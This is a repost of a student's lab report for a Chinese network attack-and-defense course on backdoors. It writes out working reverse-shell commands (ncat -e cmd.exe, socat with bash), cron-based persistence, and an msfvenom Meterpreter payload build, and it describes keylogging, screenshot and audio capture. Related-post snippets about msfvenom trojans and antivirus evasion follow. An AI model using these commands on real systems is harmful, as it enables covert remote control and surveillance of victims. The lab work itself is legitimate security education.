20145201 李子璇 《网络攻防》 后门原理与实践

最新推荐文章于 2024-09-16 13:36:19 发布
最新推荐文章于 2024-09-16 13:36:19 发布
阅读量109 收藏
点赞数
文章标签: 操作系统 shell 网络
原文链接:http://www.cnblogs.com/20145201lzx/p/6544366.html
版权

1.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 软件中本身就含有后门
  • 和软件进行捆绑,下载打开后进入系统
  • 由于系统漏洞,主机被攻击了,从而被安装了后门

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • 让用户以为是正常的软件,启动软件时后门就启动。
  • Linux定时任务系统 Cron,让使用者在固定时间或固定间隔执行程序。
  • Win系统 用任务计划程序来定时自动运行程序

(3)Meterpreter有哪些给你映像深刻的功能?

  • 记录键盘输入的字符
  • 开启摄像头

(4)如何发现自己有系统有没有被安装后门?

  • 系统运行速度突然变得缓慢:占用了内存和CPU资源,在后台运行了大量非法操作
  • 检查系统对外开放的端口,看有没有可疑的进程使用某个端口传输数据。
    netstat –an来查看所有TCP/UDP端口的连接

2.实验总结与体会
本次实验我学习了nc如何获取远程主机的Shell,使用msfenom生成后门可执行文件,然后尝试了一些Meterpreter常用功能,如记录键盘的输入,截屏,对网络系统的操作等。这一路做下来感觉太可怕,我们现在做的对于大神来说恐怕只是小case而已,提高安全意识从贴上摄像头开始...

3.实践过程记录

(1)使用netcat获取主机操作Shell,cron启动
win获得linux shell

  • win查看ip地址
    886975-20170314110607463-505195636.png

  • win打开监听(这时需要允许防火墙访问)
    886975-20170314112813963-1312790108.png

  • linux反弹连接win
    886975-20170314113027807-251292790.png

  • 在在windows下就获得了linux的shell,可以运行linux下的指令,我选择运行ls命令尝试一下:
    886975-20170314113259620-781670845.png
    成功了

linux获得win shell
  • 在kali中获取linux的ip
    886975-20170314111554010-1826425660.png
  • 在win下反弹连接linux
    输入c:\nc文件目录路径>ncat.exe -e cmd.exe 192.168.134.128 5201
  • 连接上之后,在linux下可看到windows命令提示
    886975-20170314112458260-1994286839.png
cron启动

在linux终端输入crontab -e命令,可以修改用户的cron配置:
886975-20170314114533791-325794135.png

修改一下
886975-20170314114948651-1669139330.png
此时,linux每分钟自动运行指令,反弹至win的5201端口。
886975-20170314115240104-911809754.png
可以使用命令crontab -l 查看查看配置文件
886975-20170314115454745-2008107231.png
获取shell成功后,ls一下看看
886975-20170314115723073-257687948.png

(2)使用socat获取主机操作Shell, 任务计划启动
  • windows使用socat获取kali shell:
    kali上用socat tcp-listen:5201把cmd绑定到端口5201
    并用socat tcp-l:5201 system:bash,pty,stderr反弹连接
    886975-20170314141425666-630785672.png

windows使用socat readline tcp:192.168.134.129 5201开启监听
886975-20170314141135760-1897033797.png

检测一下
886975-20170314141816245-2010085844.png

(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分)

meterpreter

生成后门程序

  • 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.26.155.4 LPORT=5201 -f exe > 5201lzx.exe来生成后门程序,然后用ncat方法发送到windows机中。

886975-20170319183844791-262865970.jpg

  • 在Kali端用msfconsole指令进行msf设置,使用监听模块,设置payload,设置反弹回连的IP和端口。
    886975-20170317150555573-233862205.png

  • 运行 获取主机shell
    886975-20170317150942229-204131444.png

(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

  • 用screenshot来截个图吧..
    886975-20170319184256182-1153802714.jpg

  • 获取记录击键记录..
    886975-20170317151344432-1873044494.png
    886975-20170317151353916-1141790323.png

  • 获取音频..
    886975-20170317151435776-442843643.png
    886975-20170317151451604-17696405.png

不过 提权失败了...

转载于:https://www.cnblogs.com/20145201lzx/p/6544366.html

weixin_30555515
关注
BERT的结构,并展示如何利用预训练的BERT模型进行自然语言处理任务的建模 BERT Explained: Stateoftheart Pretraining for NLP
程序员光剑
08-05 845
BERT(Bidirectional Encoder Representations from Transformers)是一种基于Transformer的预训练语言模型,其通过构建一个双向上下文编码器对文本进行建模。在最近几年里,BERT在许多自然语言处理任务上取得了最先进的结果。它已经成为许多领域最流行的预训练模型之一,包括命名实体识别、情感分析、文本分类、问答系统等。本教程将详细阐述BERT的结构,并展示如何利用预训练的BERT模型进行自然语言处理任务的建模。
html语言表格内只能输出int,LODOP中ADD_PRINT_TABLE、HTM、HTML表格自动分页测试
weixin_31461519的博客
05-31 1610
LODOP中超文本超过打印项高度会自动分页,那么对于超大行,该行处在分页高度位置会怎样呢?本文用来测试一下三个语句对html中table中超大行在分页高度位置的处理。测试结果:ADD_PRINT_TABLE 特点:不切行,只能输出一个table,嵌套复杂等表格不行。当某一行高超过打印项高度时,不会按照打印项高度分页,不切行,而是输出整个行,行跨页隐藏后面的内容,不会分到下一页。如图-----达到了...
Msfvenom介绍及利用
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
msfvenom常用参数
m0_61506558的博客
08-29 1585
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
msfvenom的介绍以及基本使用
H_zcn的博客
10-22 1403
metasploit是一个非常强大的攻击,它不仅仅是能对windows系统进行攻击,还支持全平台的攻击,例如Linux,macOS,安卓手机等等,在上一篇metasploit框架介绍中我们简单的了解了metasploit里一些基本框架与命令,以及还体验了最基本的攻击流程,接下来我将进一步的介绍metasploit另外的一些功能与使用方法。msfvenom 有病毒,毒液的意思,它有来生成后门的功能。msfvenom是msfpayload(攻击载荷)和msfencode(编码加密)的组合。
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3994
msfvenom的使用
Msfvenom生成木马实验
m0_74025111的博客
04-24 1170
编码处理型:msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>/root/Desktop /putty.exe -k -f exe -o /tmp/putty_evil.exe生成伪装木马,将payload。
(1)知识图谱之_window下neo4j安装
qq_29976261的博客
06-20 1265
一,下载 点击下载,修改版本号后可以根据版本号下载指定版本 https://neo4j.com/artifact.php?name=neo4j-community_windows-x64_3_3_1.exe 二,安装 双击安装,选择安装地址 安装成功后,start eno4j 选择存放数据库的位置,如:D:\bian\KnowledgeGraph\eno4j 三,访问 访问地...
【科普干货】3张图搞懂Salesforce的认证体系(附新手考证攻略)
zillitha的博客
12-09 3000
Salesforce.com,这家神一般的公司及其产品我就不多说了,需要了解的可以阅读我的另一篇科普文章《一张图读懂Salesforce的产品架构》。 今天给大家带来另一篇关于Salesforce认证考试的科普文章。 Salesforce认证计划概述 最近这一两年,Salesforce的Trailhead和认证太热门了,小伙伴们前赴后继地刷Badge拿认证,可以考的认证也随着产品家族的增加而增加,...
【科普干货】一张图看懂Salesforce最新产品结构
zillitha的博客
11-18 6092
放眼全世界,当今最具影响力的云CRM供应商当属Salesforce已经完全没有争议了。可以说Salesforce是在全球普及SaaS模式企业应用的第一功臣,并且Salesforce在本世纪初也已超越了销售自动化和CRM的范畴,通过不断的自研和收购提供了一揽子可以满足不同业务类型、不同角色、和不同行业的云业务解决方案。 随着产品的不断丰富和升级,Salesforce的产品结构也不断调整,产品不仅按类...
msfvenom的使用&免杀&外网渗透
`or 1 or 不正经の泡泡
03-13 6071
msfvenom的基本使用 这玩意是啥我就不介绍了,懂得都懂. 这篇博客将结合我本人的自身经验来说明大致的使用方式,这里的话只介绍,目前比较常用的几个方法和参数. payload 查看与使用 payload你可以理解为就是一种攻击的方案,生成何种攻击方式,对那种平台进行攻击 使用参数 -p来进行设置, 查看为-l payload具体的看如下案例 encoders的使用 参数 -e 这个是指选择何种方式编码,提高木马免杀的概率,此外还有参数 -i -b 不过有本人亲测使用-e即可,甚至不用指定,原因是无论你
Msfvenom
LIVE
04-04 1521
windows: c:\metasploit>msfvenom.bat -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.199 LPORT=3080 -e x86/shikata_ga_nai -i 3 -f exe > c:\2.exe c:\metasploit>m...
2018-2019-2 20165114《网络对抗技术》Exp2 后门原理实践
weixin_30493321的博客
03-21 182
目录 一、实验准备 二、实验内容 三、基础问题回答 四、实验过程及步骤 五、实验总结与体会 六、实验中遇到的问题与错误。 一、实验准备 1、后门概念 后门就是不经过正常认证流程而访问系统的通道。 哪里有后门呢? 编译器留后门 操作系统后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。 一个相对狭义一点的后门的概念: 特指潜伏于操作系统中专门做...
metasploit---msfvenom
孤的博客
11-21 1531
在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以...
Msfvenom的简单用法
热门推荐
Shanfenglan's blog
11-04 7万+
CATALOG1.常见高级参数2.常用生成载荷命令2.1 生成linux系统反向shell载荷2.2 生成windows系统载荷2.3 生成web类型载荷2.4 生成语言类载荷 1.常见高级参数 参数字段 效果 set PrependMigrate true 启用迁移进程(默认为:false) set PrependMigrateProc explorer.exe 迁移到此进程名:explorer.exe set SessionExpirationTimeout 0 会话超时时间0秒
4.网络编程
weixin_45476535的博客
09-14 586
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
软件安装攻略:EmEditor编辑器下载安装与使用
qq_39241682的博客
09-14 955
EmEditor是一款在Windows平台上运行的文字编辑程序。EmEditor以运作轻巧、敏捷而又功能强大、丰富著称,得到许多用户的好评。Windows内建的记事本程式由于功能太过单薄,所以有不少用户直接以EmEditor取代,emeditor是一个跨平台的文本编辑器,主要功能和特点如下:1.语法高亮支持对20多种编程语言进行语法加亮,包括 C++,Java,HTML,Perl,Python 等。您还可以自定义高亮规则。2.配置。
Linux入门1
m0_62770407的博客
09-15 1052
Linux的内核源码开源,所以只需要在内核的基础上加入内核程序就能形成一个完美可用的“操作系统”。虚拟机的名字密码根据自己喜好设置即可,接下来我将虚拟机放到了D盘中,大小根据需求,接下来直接点击下一步即可。第一种是绝对路径,第二种是在。当不使用选项和参数,直接使用ls命令本体,表示:以平铺形式,列出当前工作目录下的内容。不同的发行版在Linux的基础部分都是相同的,本教程是以常用的CentOS为例展开。当Linux终端(命令行)打开的时候,会默认以用户的HOME目录作为当前的工作目录。
Linux入门——“Linux基本指令”上
2301_79972085的博客
09-14 991
在刚开始学习Linux时,首先需要掌握一些基本指令,以便我们能更好地使用Linux操作系统,以下指令在Ubuntu 22上执行。以下内容不过多介绍选项内容。
关于HarmonyOS的学习
最新发布
m0_72035166的博客
09-16 1240
1.node模块化​​​​// tab()2.path模块// path内置模块,专门用来处理路径​// 获取路径最后一部内容,一般用它来获取文件名称​// 给定的路径连接在一起,可以把路径片段拼成完整路径// const result = path.join('day13', 'code', '03_path模块.js')// const result = path.join('day13', 'code', '../','03_path模块.js')​。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值